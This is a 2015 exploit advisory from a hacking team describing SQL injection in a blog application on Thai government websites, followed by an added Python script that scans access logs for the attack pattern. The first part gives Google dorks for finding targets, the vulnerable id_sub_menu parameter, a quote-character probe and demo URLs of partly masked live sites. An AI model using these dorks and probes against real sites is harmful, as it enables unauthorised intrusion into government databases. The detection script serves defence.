=========================================================
[+] Title :- Thailand Gov Custom Blog WebApp SQL Injection
[+] Date :- 1 - June - 2015
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greetz to :- @@lu, Lalit, MyLappy:3, Diksha
[+] Facebook :- fb.com/shelesh.rauthan
[+] Gmail.com :- indian.1337.hacker@gmail.com
=========================================================
[+] Dork site:go.th inurl:"id_sub_menu="
site:th inurl:"id_sub_menu="
=========================================================
[+] About :- Thailand government authorities run a custom blog web application on major websites, and it is vulnerable to SQL injection!
SQL-vulnerable component path: /home/ABC/domains/DOMAIN.go.th/public_html/core_main/module/web/blog/blog.php
=========================================================
[+] Description :-
Search Google with the dorks given above and open any site from the results that has "web/blog&id_sub_menu=" in its URL.
Note:- Replace the "&namemenu=" parameter at the end of the URL.
SQL-vulnerable link: "DOMAIN.go.th/XXX/index.php?mod=blog&path=web/blog&id_sub_menu=102%27"
[+] Demo :-
http://www.sXXXa.mXX.go.th/sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%27
http://www.seXXX9.go.th/web/spm19/index.php?mod=blog&path=web/blog&id_sub_menu=59%27
http://www.XXea6.go.th/cma/index.php?mod=blog&path=web/blog&id_sub_menu=45%27
http://thiXc.th/index.php?mod=blog&path=web/blog&id_sub_menu=48%27
=========================================================
Severity Level: [+] High
Request Method(s): [+] GET / POST
Vulnerable Parameter(s): [+] id_sub_menu, blog
Affected Area(s): [+] Entire admin, database, Server
===========================================================
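For operators of an affected site, a detection check for the request pattern described above. This is an added example, not part of the original advisory: it scans web access logs for id_sub_menu values that are not plain integers. The sample log lines, IP addresses and paths are constructed, and treating id_sub_menu as an integer ID is an assumption based on the values shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); IPs and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2015:10:00:01 +0700] "GET /web/index.php?mod=blog&path=web/blog&id_sub_menu=102 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jun/2015:10:00:07 +0700] "GET /web/index.php?mod=blog&path=web/blog&id_sub_menu=102%27 HTTP/1.1" 200 312
192.0.2.44 - - [01/Jun/2015:10:00:09 +0700] "GET /web/index.php?mod=blog&path=web%2Fblog&id_sub_menu=59%2527 HTTP/1.1" 200 298
192.0.2.10 - - [01/Jun/2015:10:01:00 +0700] "GET /web/index.php?mod=news&id=7 HTTP/1.1" 200 2048
192.0.2.77 - - [01/Jun/2015:10:02:00 +0700] "GET /web/index.php?mod=blog&path=web/blog&id_sub_menu= HTTP/1.1" 200 300
"""

# client IP, request target and status from a combined-format log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Parameter named in the advisory; assumed here to carry an integer ID.
WATCHED = ("id_sub_menu",)


def suspicious_requests(log_text):
    """Return (client_ip, parameter, decoded_value) for every watched
    parameter whose value is not a short run of digits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, _status = m.groups()
        # parse_qs percent-decodes once; keep_blank_values reports "id_sub_menu=" too
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name in WATCHED:
            for value in params.get(name, []):
                if not re.fullmatch(r"[0-9]{1,10}", value):
                    hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer {name}={value!r}")
```

Access logs record only the query string, so parameters sent in a POST body are not covered by this check. The same integer-only rule, enforced in blog.php before the value reaches the query, is the corresponding input validation.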